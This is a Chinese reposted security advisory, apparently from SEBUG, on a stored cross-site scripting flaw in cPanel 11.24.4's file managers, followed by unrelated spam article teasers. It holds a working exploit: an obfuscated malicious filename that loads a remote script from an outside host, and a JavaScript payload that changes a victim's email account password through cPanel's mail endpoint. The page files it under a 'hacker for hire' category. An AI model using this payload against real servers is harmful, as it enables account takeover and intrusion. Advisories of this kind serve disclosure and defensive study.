cPanel文件管理器文件名HTML注入漏洞

访客4年前关于黑客接单1321

影响版本:
cPanel 11.24.4-CURRENT
漏洞描述:
BUGTRAQ  ID: 34142

cPanel是基于web的工具,用于自动化控制网站和服务器。

Cpanel内嵌有两个文件管理器,分别为标准和旧式文件管理器。这两个文件管理器在处理文件名时存在跨站脚本漏洞,远程攻击者可以通过创建特制的文件名注入并执行脚本。

对于旧式文件管理器,只要查看了文件列表就可以执行攻击者的代码;对于标准文件管理器,文件列表经过转义,但如果用户对恶意文件执行了删除、拷贝、移动、重新命名等任务的话,仍可能执行注入的脚本。

由于文件名中禁用斜线字符,因此攻击者无法直接使用<script>标签加载脚本。为了摆脱这个限制,攻击者可以通过<img>标签onError属性注入脚本并将src属性设置为空字符串来强制触发出错事件。通过<img>标签注入的脚本生成<script>标签,使用document.write()函数执行外部脚本。 <*参考 
Rizki Wicaksono (rizki.wicaksono@gmail.com)
http://marc.info/?l=bugtraq&m=123730614528241&w=2.
*>
SEBUG安全建议:
厂商补丁:

cPanel
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.cpanel.net.
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
恶意文件名:

<img src=\'\' onerror=\'document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,105,108,109,117,104,97,99,107,105,110,103,46,99, 111,109,47,120,46,106,115,62,60,47,115,99,114,105,112,116,62))\'>

该<img>生成以下html标签,以导致浏览器加载并执行外部脚本:

<script src=http://ilmuhacking.com/x.js></script>

PoC负载:

----------------
var http_request = false;
function makePOSTRequest(url, parameters) {
http_request = false;
if (window.XMLHttpRequest) { // Mozilla, Safari,...
http_request = new XMLHttpRequest();
if (http_request.overrideMimeType) {
    http_request.overrideMimeType(\'text/html\');
}
} else if (window.ActiveXObject) { // IE
try {
    http_request = new ActiveXObject(\"Msxml2.XMLHTTP\");
} catch (e) {
    try {
       http_request = new ActiveXObject(\"Microsoft.XMLHTTP\");
    } catch (e) {}
}
}
if (!http_request) {
alert(\'Cannot create XMLHTTP instance\');
return false;
}
http_request.onreadystatechange = alertContents;
http_request.open(\'POST\', url, true);
http_request.setRequestHeader(\"Content-type\", \"application/x-www-form-urlencoded\");
http_request.setRequestHeader(\"Content-length\", parameters.length);
http_request.setRequestHeader(\"Connection\", \"close\");
http_request.send(parameters);
}
function alertContents() {
if (http_request.readyState == 4) {
if (http_request.status == 200) {
    result = http_request.responseText;
    alert(result);
} else {
    alert(\'There was a problem with the request.\');
}
}
}
var poststr = \"quota=\" + encodeURI(\"250\") + \"&password2=\" + encodeURI(\"newpassword\") \\
                +
        \"&password=\" + encodeURI(\"newpassword\") + \"&email=\" + encodeURI(\"testemail\") +
        \"&domain=\" + encodeURI(\"ilmuhacking.com\");
makePOSTRequest(\'/frontend/x3/mail/dopasswdpop.html\', poststr);

 

标签: 好话题

相关文章

今日头条微信小程序因违规被暂停服务_今日头条

1月31日消息 今天晚间九点前后,字节跳动旗下今日头条微信小程序因违规呗暂停服务。提示页面显示,小程序今日头条由于所选类目与小程序运营内容不符合已暂停服务。经过核实,iOS版与安卓版微信均已无法搜索到...

私人调查合法吗,简单介绍一下_私家

如果说中国最合法的私人调查,想要查询相关事情的话,可能就是派出所,公安局这边,他们到时候行动可以说是法律允许的范围。据新华网报道:南昌公园发生命案。可能很多人都会好奇私人调查合法吗?这种可以说是一把双...

标准间是什么意思(旅店标准间是什么样子配套)

旅行,不仅仅是为了看到异地的风景,更重要的是享受和自然亲密无间的距离,沉浸在自然的怀抱中。营地房车,就是专为此而设计。 作为一辆售价达到了32.98万米的营地房车,...

销售人员的最高境界,就是做好个人品牌!你学会了嘛_新媒体运营

我们会发现一个现象,对于一些总是夸夸其谈的人来说,他们总是会说一句话:“道理我都知道,可就是做不到啊!” 这里要分两种情况,一种情况是他自己认为自己明白很多道理,其实根本就没搞明白道理背后的原理是什么...

网上怎么查开宾馆记录(查开宾馆记录app安卓)_开宾馆记录

网上怎么查开宾馆记录(查开宾馆记录app安卓)作为社会上的一种貌寝征象,暗里与家人大概会的网民在品德上是不行容忍的。为了在网上交异性同事,少许人在网上交异性同事,做少许违抗品德和伉俪情绪的工作。不但毁...

熊掌号新手入门教程 熊掌号运营推广知识_熊掌号

熊掌号新手入门教程 我已经和你分享了熊掌号码的一些原因,以及熊掌号码对自我媒体和企业营销的重要性,但是许多小伙伴在阅读后已经注册了他们的账号,但是不知道如何开始运营。接下来,我将逐步带你学习熊站号码...